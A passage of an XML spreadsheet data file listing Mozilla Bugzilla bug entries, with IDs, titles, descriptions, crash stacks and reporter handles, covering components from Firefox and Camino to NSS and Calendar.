    <t>Support XForms 1.1 insert action</t>
  </si>
  <si>
    <t>We've had numerous requests for support of the 1.1 insert action to allow for easier copying of instance data between instance documents especially when the documents live in different models.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-179554</t>
  </si>
  <si>
    <t>shift-tab won't cycle backwards when focus is on pref tab</t>
  </si>
  <si>
    <t>spun off from bug 155686. if focus is on the preference tab shift-tab will not
cycle focus backwards --but only if you're NOT on the first panel of a pref
category with multiple panels.
in other words this is so far only a problem on:
Navigation &gt; History
Navigation &gt; Tabbed Browsing
Appearance &gt; Fonts
all other panels and tab are fine.</t>
  </si>
  <si>
    <t>camino</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-42031</t>
  </si>
  <si>
    <t>X-remote</t>
  </si>
  <si>
    <t>x-remote code leaks strings all over the place</t>
  </si>
  <si>
    <t>After an email conversation with danm ( probably scc indirectly ) I realized
that I had been using pas of the sctring classes incorrectly and am probably
leaking strings all over the place.  I went through the code and cleaned up my
string usage.  Patch will be attached in a moment.  I sent this to scc to look
at for review to make sure that I'm doing this the right way.
Trial by fire I tell you.</t>
  </si>
  <si>
    <t>CORE-936935</t>
  </si>
  <si>
    <t>Mark lines dirty more accurately during bidi resolution</t>
  </si>
  <si>
    <t>Created attachment 829897
less.dirty.diff
Split out from bug 646359. After some heavy debugging I realized that the reason why the original patch in attachment 495873 had caused bug 654419 was not what I said in bug 646359 comment 1 but that when encountering line breaks in preformatted text in nsBidiPresUtils::TraverseFrames we can create continuations and in that case we need to dirty the line. This is the last hunk of the patch.
On the other hand I think we were dirtying lines too often in ResolveParagraph (which covered up the fact that we weren't doing it when we should) so the rest of the patch moves the dirtying to points where we are changing or creating continuations.
However! the try run https://tbpl.mozilla.org/?tree=Try&amp;rev=4089c3ced4a8 shows that this breaks layout/reftests/text-overflow/xulscroll.html but that seems to be because of a separate bug which again was beeing hidden by the unnecessary dirtying.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-458692</t>
  </si>
  <si>
    <t>Drop charset parameter from nsIMsgHeaderParser interfaces</t>
  </si>
  <si>
    <t>Created attachment 341909
The fix
Back in bug 414432 comment 7 we agreed to drop the charset parameter from the nsIMsgHeaderParser interfaces because it wasn't used and also not needed.
Attaching a patch which does just that and cleans up some of the documentation in nsIMsgHeaderParser.
I'm expecting that we can remove the noscript and have a string tidy up on the other functions but that can come in a later bug/patch - simple bits first.</t>
  </si>
  <si>
    <t>CALENDAR-132615</t>
  </si>
  <si>
    <t>Launching Calendar twice opens two windows</t>
  </si>
  <si>
    <t>Chris:
  You put the code into calendarOverlay.js so I'm sending this one to you.  If
you can't fix it quickly then just reassign it to me.
  When I click on Tasks-&gt;Calendar it opens up additional calendar windows
instead of focusing the one that is already open.
  To reproduce just go to tasks-&gt;Calendar and open up some windows.</t>
  </si>
  <si>
    <t>netscape</t>
  </si>
  <si>
    <t>CORE-257097</t>
  </si>
  <si>
    <t>Offline/online switcher is not UI Grabble.</t>
  </si>
  <si>
    <t>Steps to Reproduce:
1. Start Mozilla and GOK.
2. In GOK click UI Grab.
Bug Observation:
There is no pointer to online/offline switcher at the right bottom of Mozilla
window.</t>
  </si>
  <si>
    <t>FIREFOX-347463</t>
  </si>
  <si>
    <t>Proxy icon (favicon) in location bar scaled badly when feed or lock icon displayed</t>
  </si>
  <si>
    <t>When the feed or lock icons are displayed in the location bar the height of the location bar increases.  Open a site without any extra icons (such as http://www.google.com/) in one tab and open a site with a feed icon (such as http://www.mozilla.org) in another tab.  Switch between the two tabs.  Notice how the location bar grows and shrinks vertically.  Ew.
One particularly nasty manifestation of this bug is that the page proxy icon (favicon) will expand to 16x18px when the feed or lock icons are also displayed in the location bar.  The proxy icon appears stretched vertically.  This is nasty.</t>
  </si>
  <si>
    <t>autonome</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-439411</t>
  </si>
  <si>
    <t>point mozilla-world.org domain to mozilla.com</t>
  </si>
  <si>
    <t>In the past (Firefox 1.x) mozilla europe was hosting in-product pages for all locales on the http://www.mozilla-world.org/ domain. All of these locales now have in-product pages on mozilla.com and the pages we have promote Firefox 1.x features so I would like mozilla-world.org to point to mozilla.com so as to be able to clean up our PHP code on mozilla europe and remove all mozilla-world.org only folders.</t>
  </si>
  <si>
    <t>BUGZILLA-289580</t>
  </si>
  <si>
    <t>Templatize the 'confirm delete' bit of editproducts</t>
  </si>
  <si>
    <t>timello</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-209524</t>
  </si>
  <si>
    <t>stalk word list cannot have length one</t>
  </si>
  <si>
    <t>CZ 0.8.32
The stalking list cannot contain just one entry only zero or at least two:
- Start with an empty list
- add one entry (say one) leave the pref via OK and come back ==&gt; the
stalking list is *empty*
- add two entries (say one and two) leave and return ==&gt; both entries are
in the list
- have two entries in list and remove one leave and return ==&gt; both are gone
the list is empty again.
Reproducible: always</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-200917</t>
  </si>
  <si>
    <t>Embedding: GTK Widget</t>
  </si>
  <si>
    <t>UserAndPassword prompt should have a checkbox</t>
  </si>
  <si>
    <t>You can test it at:
http://www.gemal.dk/browserspy/password.html
While mozilla shows a checkbox to remember u/p TestGtkEmbed doesnt.</t>
  </si>
  <si>
    <t>THUNDERBIRD-271841</t>
  </si>
  <si>
    <t>Show full newsgroup name as tooltip for abbreviated newsgroup names</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
In the tree pane newsgroup names are shown as l.d.user (for example) and
there's no tooltip. It'd be nice if the tooltip would show linux.debian.user
instead.
Reproducible: Always
Steps to Reproduce:
1. -
2.
3.</t>
  </si>
  <si>
    <t>OlafvdSpek</t>
  </si>
  <si>
    <t>WEBTOOLS-115150</t>
  </si>
  <si>
    <t>MXR</t>
  </si>
  <si>
    <t>LXR regexp searching is limited by glimpse constraints</t>
  </si>
  <si>
    <t>I'm having zero luck finding things with an lxr regexp search like:
PRBool[\t ]+m[A-Z]
Did someone break this?</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-680089</t>
  </si>
  <si>
    <t>reimage mv-moz2-linux-ix-slave12</t>
  </si>
  <si>
    <t>This host came back from iX in bug 657015 but hasn't been online since.  I can get to its IPMI (well to *an* IPMI interface) but the session times out immediately on login so I can't bring it up.
Needs manual TLC.</t>
  </si>
  <si>
    <t>FIREFOX-489681</t>
  </si>
  <si>
    <t>Add a localized names for Tags in the Library</t>
  </si>
  <si>
    <t>split from bug 484019.
Actually when creating library left pane in PlacesUIUtils we read the name Tags through bookmarks service and it is set in toolkit properties.
Since other Library queries have their own entry in places.properties could make sense adding an entry for Tags too.</t>
  </si>
  <si>
    <t>FIREFOX-398478</t>
  </si>
  <si>
    <t>clear globalStorage for offline apps separately from cookies</t>
  </si>
  <si>
    <t>Created attachment 283461
v1
When clearing private data:
* We don't want offline website data to be cleared with cookies
* We do want globalStorage for non-offline apps to be cleared with cookies.
The attached patch clears these two sets separately.  It's a bit ugly suggestions for alternate approaches would be nice.</t>
  </si>
  <si>
    <t>FIREFOX-248817</t>
  </si>
  <si>
    <t>pressing delete with nothing selected breaks delete in Bookmark Manager</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040614 Firefox/0.9
If you are deleting items one after the other in the bookmark manager the focus
will shift downwards in the list of items as you repetitively delete. When it
hits the bottom and no item is selected hitting delete again will cause the
bookmark manager to ignore subsequent delete commands even if you have selected
an actual item. Closing the bookmark manager and restarting it solves the problem.
Reproducible: Always
Steps to Reproduce:
1. Open Bookmark Manager
2. Select the final item
3. Delete it
4. No item is no selected select the new final item
5. Delete commands are ignored
Actual Results:  
The bookmark manager ignores delete commands until it is restarted.
Expected Results:  
Allowed the focus to be shifted to another item and deleted.</t>
  </si>
  <si>
    <t>DOCUMENTATION_GRAVEYARD-145747</t>
  </si>
  <si>
    <t>Spelling error on web-developer evangelism page</t>
  </si>
  <si>
    <t>standard complient to standards-compliant</t>
  </si>
  <si>
    <t>web.developer</t>
  </si>
  <si>
    <t>fun</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-326873</t>
  </si>
  <si>
    <t>ChatZilla should be less picky about filenames</t>
  </si>
  <si>
    <t>Currently escapeFileName in utils.js is really cautious about what we allow in filenames. A bit too cautious according to some. We might want to look into allowing more characters.</t>
  </si>
  <si>
    <t>CORE-501953</t>
  </si>
  <si>
    <t>[HTML5][Patch] Content encoding error (invalid or unsupported form of compression) at http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2009-June/020620.html</t>
  </si>
  <si>
    <t>With HTMl5.enabled set to true I get the following xul error page when loading http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2009-June/020620.html
Content Encoding Error
The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.</t>
  </si>
  <si>
    <t>NSS-353374</t>
  </si>
  <si>
    <t>Klocwork 76494 - Null ptr derefs in CERT_FormatName</t>
  </si>
  <si>
    <t>In file nss/lib/certhigh/certhtml.c in function CERT_FormatName 
there are 8 calls to CERT_DecodeAVAValue each of which returns a pointer.
Immediately following each call that pointer is derefenced without first
being checked for NULL.  The function can and does occasionally return NULL.
Klockwork IDs 76494 76496 76498 46500 76502 76504 76506 76508.</t>
  </si>
  <si>
    <t>CORE-295715</t>
  </si>
  <si>
    <t>HTML table should use summary attribute for accessible name</t>
  </si>
  <si>
    <t>Given the following table:
 .. 
We should use the summary attribute for the accessible name of the ROLE_TABLE
object.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-343857</t>
  </si>
  <si>
    <t>document Help &gt; Report Web Forgery menu item</t>
  </si>
  <si>
    <t>CORE-367128</t>
  </si>
  <si>
    <t>Text in feBlend filter example is unreadable on Mac</t>
  </si>
  <si>
    <t>http://www.w3.org/TR/2002/CR-SVG11-20020430/images/filters/feBlend.svg
is supposed to look like
http://www.w3.org/TR/2002/CR-SVG11-20020430/images/filters/feBlend.png
but instead it looks like
http://www.squarefree.com/temp/feBlend.png
tor thinks this is Mac-only.</t>
  </si>
  <si>
    <t>DEVTOOLS-938111</t>
  </si>
  <si>
    <t>DEVTOOLS</t>
  </si>
  <si>
    <t>Purge the developer tools of innerHTML: Editor - openDialog codemirror extension</t>
  </si>
  <si>
    <t>CodeMirror manages to completely avoid use of innerHTML (yay!) but our openDialog extension doesn't. This is unfortunate as whilst this is not exploitable at present the use of innerHTML now is a common cause of vulnerability later.
See: https://mxr.mozilla.org/mozilla-central/source/browser/devtools/sourceeditor/codemirror/dialog/dialog.js#13</t>
  </si>
  <si>
    <t>mgoodwin</t>
  </si>
  <si>
    <t>CORE-160921</t>
  </si>
  <si>
    <t>DHTML rendered really slowly when window small</t>
  </si>
  <si>
    <t>the DHTML-test renders really slow (and CPU-idle goes to 0%) when browser-window
is smaller then about 750x700 (on all 1.1x builds and some 0.9.x builds not so
on 1.0Milestone)</t>
  </si>
  <si>
    <t>damir.perisa</t>
  </si>
  <si>
    <t>CORE-422661</t>
  </si>
  <si>
    <t>Long border is rendered incompletely</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 ru rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b5pre) Gecko/2008031205 Minefield/3.0b5pre
The problem was found by Forest from forum.mozilla-russia.org.
Searching for a bug to describe the problem I have found the bug #228340 which is seemingly similar to this one.
Mozilla/5.0 (Windows U Windows NT 5.1 ru rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12 shows everything correctly.
Reproducible: Always
Steps to Reproduce:
1. Open the URL
2. Scroll down to the table's end
Actual Results:  
See no table border at the end of the table.
Expected Results:  
See the table border</t>
  </si>
  <si>
    <t>tim_tim2000</t>
  </si>
  <si>
    <t>CORE-519943</t>
  </si>
  <si>
    <t>Pixel scrolling does not work on x86_64 builds on Mac OS X (two-finger touchpad)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.6 en-US rv:1.9.3a1pre) Gecko/20091001 Minefield/3.7a1pre
Build Identifier: 
Pixel scrolling seems to be broken with 64 bit builds.
Reproducible: Always</t>
  </si>
  <si>
    <t>simon.bugzilla</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-437543</t>
  </si>
  <si>
    <t>TOC links do not honour hidden text</t>
  </si>
  <si>
    <t xml:space="preserve">If a heading uses different text depending on the OS the anchor the TOC uses contains the entire markup.
For instance on  link for:
!Tabs {DIV(class=wintype=span)}Options{DIV}{DIV(class=noWintype=span)}Preferences{DIV}
is
</t>
  </si>
  <si>
    <t>me+bugzilla</t>
  </si>
  <si>
    <t>bmo2018</t>
  </si>
  <si>
    <t>FIREFOX-294082</t>
  </si>
  <si>
    <t>Canvas does not work with installer builds</t>
  </si>
  <si>
    <t>dom_canvas.xpt is not being packaged with installers.</t>
  </si>
  <si>
    <t>FIREFOX-320914</t>
  </si>
  <si>
    <t>Firefox crashed with gnopernicus magnifier [@ nsXULMenuitemAccessible::GetState]</t>
  </si>
  <si>
    <t>I started Firefox and gnopernicus with magnifier and then quit firefox.
Firefox crashed gnopernicus also crashed.
Here's the message.
###!!! ASSERTION: No nsIDOMElement for button node!: 'element' file nsXULFormControlAccessible.cpp line 141
Break: at file nsXULFormControlAccessible.cpp line 141
WARNING: NS_ENSURE_TRUE(NS_SUCCEEDED(CheckMaiAtkObject(aAtkObj))) failed file nsAccessibleWrap.cpp line 774
###!!! ASSERTION: No DOM element for menu  node!: 'element' file nsXULMenuAccessible.cpp line 65
Break: at file nsXULMenuAccessible.cpp line 65
###!!! ASSERTION: You can't dereference a NULL nsCOMPtr with operator-&gt;().: 'mRa
sible.cpp line 65
Break: at file nsXULMenuAccessible.cpp line 65
###!!! ASSERTION: You can't dereference a NULL nsCOMPtr with operator-&gt;().: 'mRawPtr != 0' file ../../../dist/include/xpcom/nsCOMPtr.h line 849
Break: at file ../../../dist/include/xpcom/nsCOMPtr.h line 849
Program dist/bin/firefox-bin (pid = 928) received signal 11.
Stack:
UNKNOWN [dist/bin/libxul.so +0x0001A4D7]
__kernel_sigreturn+0x00000000 [ +0x00000420]
UNKNOWN [/home/ginn/firefox1216/mozilla/dist/bin/components/libaccessibility.so +0x0003C6AD]
UNKNOWN [/home/ginn/firefox1216/mozilla/dist/bin/components/libaccessibility.so +0x000645C3]
atk_object_ref_state_set+0x000000A9 [/usr/lib/libatk-1.0.so.0 +0x0000B0AC]
UNKNOWN [/usr/lib/libspi.so.0 +0x0002DF1B]
Stack:
#0  0xffffe410 in ?? ()
#1  0xbfb713fc in ?? ()
#2  0xb75e60dc in ?? () from /lib/tls/i686/cmov/libc.so.6
#3  0xbfb71258 in ?? ()
#4  0xb7547d46 in nanosleep () from /lib/tls/i686/cmov/libc.so.6
#5  0xb7547b4c in sleep () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7f1b272 in ah_crap_handler (signum=11) at nsSigHandlers.cpp:132
#7  0xb7f314d7 in nsProfileLock::FatalSignalHandler (signo=11)
    at nsProfileLock.cpp:210
#8  
#9  0xb70f8bd3 in nsXULMenuitemAccessible::GetState (this=0x889e8c0 
    _retval=0xbfb71a44) at nsXULMenuAccessible.cpp:67
#10 0xb70a56ad in nsAccessible::GetFinalState (this=0x889e8c0 
    aState=0xbfb71a44) at nsAccessible.cpp:1830
#11 0xb70cd5c3 in refStateSetCB (aAtkObj=0x889eeb8) at nsAccessibleWrap.cpp:892
#12 0xb7a000ac in atk_object_ref_state_set () from /usr/lib/libatk-1.0.so.0
#13 0xb3479f1b in _ORBIT_skel_small_Accessibility_DeviceEventController_unImplemented4 () from /usr/lib/libspi.so.0
#14 0xb34770bf in _ORBIT_skel_small_Accessibility_Accessible_getState ()
   from /usr/lib/libspi.so.0</t>
  </si>
  <si>
    <t>SEAMONKEY-89921</t>
  </si>
  <si>
    <t>Problem with Banking Web Site used to work with M0.9</t>
  </si>
  <si>
    <t>I used to be able to access a banking web site with M0.9 (Build 2001050515) but
since M0.9.1 it doesn't seem to work anymore. I can login and then a new window
opens which used to wait for a moment and then present me with my balances etc.
Now it just sits there saying Please wait whilst we transfer you to our ANZ
Internet Banking environment and retrieve your account information. Reload has
no effect nor do cookies. I can't view the page source either as it says that it
has expired.
I used to have a problem getting to the login screen
(http://bugzilla.mozilla.org/show_bug.cgi?id=67934) at the same site but that
was resolved and it worked fine until M0.9.1.</t>
  </si>
  <si>
    <t>sim.alam</t>
  </si>
  <si>
    <t>CORE-230522</t>
  </si>
  <si>
    <t>warning C4047: 'return' : 'foo *' differs in levels of in direction from 'int'</t>
  </si>
  <si>
    <t>Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 13.00.9466 for 80x86
Copyright (C) Microsoft Corporation 1984-2001. All rights reserved.
r:/mozilla\js\src\jsparse.c(920) : warning C4047: 'return' : 'JSParseNode *'
differs in levels of in direction from 'int'
r:/mozilla\js\src\jsregexp.c(2363) : warning C4047: 'return' : 'REMatchState *'
differs in levels of indirection from 'int'</t>
  </si>
  <si>
    <t>CORE-92065</t>
  </si>
  <si>
    <t>RomanString(...) will crash for very big values</t>
  </si>
  <si>
    <t>RomanString will crash for very big values. The values will have to at least
9000 for it to crash. I saw that looking at the code. Don't know if it can ever
happen in reality. Looking at the handling of '9' it looks buggy so maybe the
code is never called and should be removed altogether. 
(9 will be converted to II instead of IX).</t>
  </si>
  <si>
    <t>FIREFOX-662659</t>
  </si>
  <si>
    <t>Don't mention Sync Key in setup wizard</t>
  </si>
  <si>
    <t>Rationale:
* Users don't get what it is ignore it anyway.
* You can get at it later.
* It suggests you can somehow get back to your data this way. But Sync doesn't want to be a backup service. Even if users use it this way let's not suggest we are one.
We should still talk about privacy and perhaps even encryption but we don't need a whole wizard page with a whatever button to do it.</t>
  </si>
  <si>
    <t>CORE-526586</t>
  </si>
  <si>
    <t>Crash in [@ nsThreadManager::Init()] when accessing TLS variable</t>
  </si>
  <si>
    <t>Bug 521750 added a TLS global variable to nsThreadManager. On Windows XP (debug and release) builds of Fennec + XULRunner we are crashing when the TLS variable is accessed in nsThreadManager::Init
Call stack:
&gt;	xul.dll!nsThreadManager::Init()  Line 110 + 0xc bytes	C++
 	xul.dll!NS_InitXPCOM3_P(nsIServiceManager * * result=0x0012ec5c nsIFile * binDirectory=0x009abf00 nsIDirectoryServiceProvider * appFileLocationProvider=0x0012ed74 const nsStaticModuleInfo * staticComponents=0x023266f8 unsigned int componentCount=50)  Line 477 + 0xc bytes	C++
 	xul.dll!ScopedXPCOMStartup::Initialize()  Line 1073 + 0x29 bytes	C++
 	xul.dll!XRE_main(int argc=1 char * * argv=0x00908b10 const nsXREAppData * aAppData=0x009abe08)  Line 3278 + 0xb bytes	C++
 	fennec.exe!NS_internal_main(int argc=1 char * * argv=0x00908b10)  Line 502 + 0x1a bytes	C++
 	fennec.exe!wmain(int argc=1 wchar_t * * argv=0x00904f60)  Line 110 + 0xd bytes	C++
 	fennec.exe!__tmainCRTStartup()  Line 327 + 0x19 bytes	C
 	fennec.exe!wmainCRTStartup()  Line 196	C
Disassembly:
#ifdef NS_TLS
  gTLSIsMainThread = true
01D8FEA8  mov         edxdword ptr [__tls_index (2B2E75Ch)] 
01D8FEAE  mov         eaxdword ptr fs:[0000002Ch] 
01D8FEB4  mov         ecxdword ptr [eax+edx*4] &lt;=== CRASH
01D8FEB7  mov         byte ptr [ecx+101h]1 
#endif
eax and edx are both 0
I checked with a release bug from here:
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mobile-trunk/fennec-1.0b5.en-US.win32.zip
The debug build was from my own m-c tree.</t>
  </si>
  <si>
    <t>FIREFOX-270198</t>
  </si>
  <si>
    <t>Switching display style of stacked DIVs on and off does not work.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.5) Gecko/20041108 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-DE rv:1.7.5) Gecko/20041108 Firefox/1.0
Content on this page is to by exposed and hidden via stacked DIV elements the
display style property of which is switched on and off by means of JavaScript
code to mimic navigation experience.
Reproducible: Always
Steps to Reproduce:
1. Just open the URL.
Actual Results:  
The area covered by the contents of the DIV elements under consideration remains
empty.
Expected Results:  
Expose the contents of the DIV element.
With IE 6 the page's behaviour is as desired.</t>
  </si>
  <si>
    <t>heller</t>
  </si>
  <si>
    <t>BUGZILLA-441542</t>
  </si>
  <si>
    <t>Graphical Reports Generate Report button has wrong CSS id</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 1.1.4322 .NET CLR 2.0.50727)
Build Identifier: 3.0.4
On the Reports &gt; Generate Graphical Report page. The second instance of the button for â€œGenerate Reportâ€ has incorrect css the id should be id=â€Generate_Reportâ€  not id=â€Generate Reportâ€ 
Reproducible: Always
Steps to Reproduce:
1. Go to Reports &gt; Graphical reports
2. Notice there are two Generate Report buttons.
3. View the code for the two buttons.
Actual Results:  
One has id=Generate_Report the other has id=Generate Report the second instance needs an underscore.
Expected Results:  
need to fix the second instance.</t>
  </si>
  <si>
    <t>guy.pyrzak</t>
  </si>
  <si>
    <t>ranstw</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-815190</t>
  </si>
  <si>
    <t>FF17 breaks page editor in Site Executive 2011 CMS</t>
  </si>
  <si>
    <t>Site Executive is a web-based web content management system. SE 2011 works in FF 2 through 16 (and IE 7-9). However its WYSIWYG page editor errors out in FF 17 with:
Error: TypeError: document.getElementById(...) is null Source File: http://SITENAME/sm/tabmodule.cfm?CurrentMode=EDIT
Line: 153
I don't know if the real error is in SE or FF. I contacted the company a few weeks ago but now that FF 17 is in live release I want to note the regression.</t>
  </si>
  <si>
    <t>francis.uy</t>
  </si>
  <si>
    <t>NSS-470500</t>
  </si>
  <si>
    <t>Firefox 3.1b2 Crash Report [@ nssutil3.dll@0x34c0 ]</t>
  </si>
  <si>
    <t>This crash is currently ranked #9 on Firefox 3.1b2 -- appears to be a new regression
0  	nssutil3.dll  	nssutil3.dll@0x34c0  	
1 	nss3.dll 	nss3.dll@0x2551c 	
2 	nss3.dll 	nss3.dll@0x2565a 	
3 	nss3.dll 	nss3.dll@0x999a 	
4 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
5 	xul.dll 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2422 
Not much to go on but comments indicate:
* Every time I close the program the Crash Reporter appears but there are no other indications of an issue.
* Updated Session Manager add-on and crashed on restart
* brought computer out of stand by
Any easy way to tell if this is in NSS or the calling code?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-479530</t>
  </si>
  <si>
    <t>sj-weave01 shows default Apache page should redirect</t>
  </si>
  <si>
    <t>https://sj-weave01.services.mozilla.com/ should redirect to services.mozilla.com (or somewhere else).</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-492634</t>
  </si>
  <si>
    <t>Please push Firefox 3.0.10 w/Personas 1.1 bundle to releases.mozilla.com</t>
  </si>
  <si>
    <t>Howdy
Please push the 3.0.10 Personas repacks to releases.mozilla.com as soon as
possible. The Personas team is looking to push the website updates as soon as possible and are blocking on the updated repacks. if the content could be
pushed asap it'd be much appreciated.
The tarball containing the installers is located at:
people.mozilla.org:/tmp/personas11-3010-signed.tar
The md5sum of the tarball is 8ae1dc0f42e79aa28d2ceacd25962069 per bug 491923
The tarball should be extracted into the server document root to a
directory that corresponds with http://releases.mozilla.com/personas/ 
If you have any questions or the above request isn't possible please let us
know.
Thanks much and apologies for the short notice (again). We'll work on getting a process in place similar to funnelcake for future releases.
kev</t>
  </si>
  <si>
    <t>kev-bugzilla</t>
  </si>
  <si>
    <t>CORE-268426</t>
  </si>
  <si>
    <t>Implement the DOM interfaces for the title desc and metadata elements</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a5) Gecko/20041102
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8a5) Gecko/20041102
text contained within title elements will be used by many documents to present
tooltip or label information. This necessitates title being part of the DOM
Reproducible: Always
Steps to Reproduce:
1.load file
2.mouseover '?'
3.
Actual Results:  
nothing
Expected Results:  
The text changes from love to help
the attachment file is only intended to show the type of use to which title text
might be put. eg .getNodeName() == title) 
my apologies that the script isn't shorter can't figure what's redundant :-(
INTERNATIONALISATION
please note that 'switch' according to the spec? is only supported for text.
THIS IS AN ERROR.
switch needs to be supported for title and desc.
a workaround to demonstrate possible use is here:
http://www.peepo.co.uk/launch/index.svg
please note this uses for french for instance: systemLanguage=fr
to ensure frenchOS users get french tooltips 
but doesn't use title as switch isn't supported :-(
I should pester WG remind me.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-399252</t>
  </si>
  <si>
    <t>API: DOM</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION</t>
  </si>
  <si>
    <t>Need to document DOM:node</t>
  </si>
  <si>
    <t>There is presently no documentation for DOM:node and needs to be.</t>
  </si>
  <si>
    <t>TOOLKIT-329045</t>
  </si>
  <si>
    <t>Firefox 2.0 Extension Manager user interface update</t>
  </si>
  <si>
    <t>This bug is for the work I am doing on the Extension Manager user interface for Firefox 2.0. This is needed to support Extension Locales (Bug 285848) and to better support Extension Dependencies (bug 298497) and Extension Blacklisting (bug 271166). There are also several other bugs I will be fixing at the same time that involve user interface modifications.</t>
  </si>
  <si>
    <t>CORE-471090</t>
  </si>
  <si>
    <t>[meta] Windows x64 build tracking bug</t>
  </si>
  <si>
    <t>This is tracking bug for building Windows x64 binary.</t>
  </si>
  <si>
    <t>CORE-669969</t>
  </si>
  <si>
    <t>Make TypeObject a GC thing</t>
  </si>
  <si>
    <t>We need to check whether type objects are marked over and over during GC regardless of how many type objects there actually are.  TypeObjects are currently malloc'ed individually and store their mark bits as a field which has the potential for lots of fragmentation and cache misses.</t>
  </si>
  <si>
    <t>bhackett1024</t>
  </si>
  <si>
    <t>CORE-514148</t>
  </si>
  <si>
    <t>Thundirbird 3 AND Firefox freeze when you drag a mail attachment over a Firefox Window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) XPCOMViewer/0.9a
Build Identifier: 
If you drag a mail attachment over a firefox window Thunderbird and Firefox freeze and Firefox memory grows indefinitely.
Tested on Windows XP with Firefox 3.5.2 and :
- thunderbird/nightly/2009-09-01-15-comm-central-trunk 
- thunderbird/nightly/2009-09-01-11-comm-1.9.1/
- Xulrunner 1.9.1 (with my own application Scenari)
Problem does not appear on Linux.
Reproducible: Always
With 1.9.1 XulRunner in my code (similar to thunderbird http://mxr.mozilla.org/comm-central/source/mail/base/content/msgHdrViewOverlay.js#1837) my DataProvider.getFlavorData() method is nether called by the framework. This method is called in thunderbird 2.0.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-707922</t>
  </si>
  <si>
    <t>disable l10n cronjob in tinderbox-builds/mozilla-beta-l10n directory on surf</t>
  </si>
  <si>
    <t>We don't do l10n dep or nightly builds on mozilla-beta so it's unnecessary to have this cronjob. It was probably working until the recent FTP problems because we may have done one or two l10n jobs here before the branch settled.</t>
  </si>
  <si>
    <t>TESTOPIA-424595</t>
  </si>
  <si>
    <t>Testopia 2 - cannot delete test run from a test plan</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 6.0 SLCC1 .NET CLR 2.0.50727 Media Center PC 5.0 .NET CLR 3.0.04506 InfoPath.2)
Build Identifier: 
Cannot delete an existing test run from a test plan
Reproducible: Always
Steps to Reproduce:
1.open testopia at http://landfill.bugzilla.org/testopia2
2.go to test plan (ex: 601)
3.go to Test Runs tab
4.right click on a test run (ex 428) and select Delete Selected Test Runs
5.confirm that you want to delete the selected test run
6.you get the confirmation that the test run was deleted
7.the test run was not deleted and you can see it in the list of test runs
Actual Results:  
test run was not deleted
Expected Results:  
test run should be deleted</t>
  </si>
  <si>
    <t>sambotin</t>
  </si>
  <si>
    <t>CORE-487831</t>
  </si>
  <si>
    <t>Remove completely unused frame methods (Get|Set)WasCollapsed</t>
  </si>
  <si>
    <t>Created attachment 372087
patch
The frame methods GetWasCollapsed and SetWasCollapsed (defined on nsFrame nsBox nsBoxFrame and nsLeafBoxFrame) are completely unused.  This patch removes them and the data members (a nsBoxLayoutMetrics member and a nsBox state bit) that support them.
(I noticed this while trying to find a sane fix for bug 486065.)</t>
  </si>
  <si>
    <t>CALENDAR-491254</t>
  </si>
  <si>
    <t>Some languages need weekdays in plural form for some particular sentences inside Recurrence Summary.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 it-IT rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b5pre) Gecko/20090503 Lightning/1.0pre Shredder/3.0b3pre
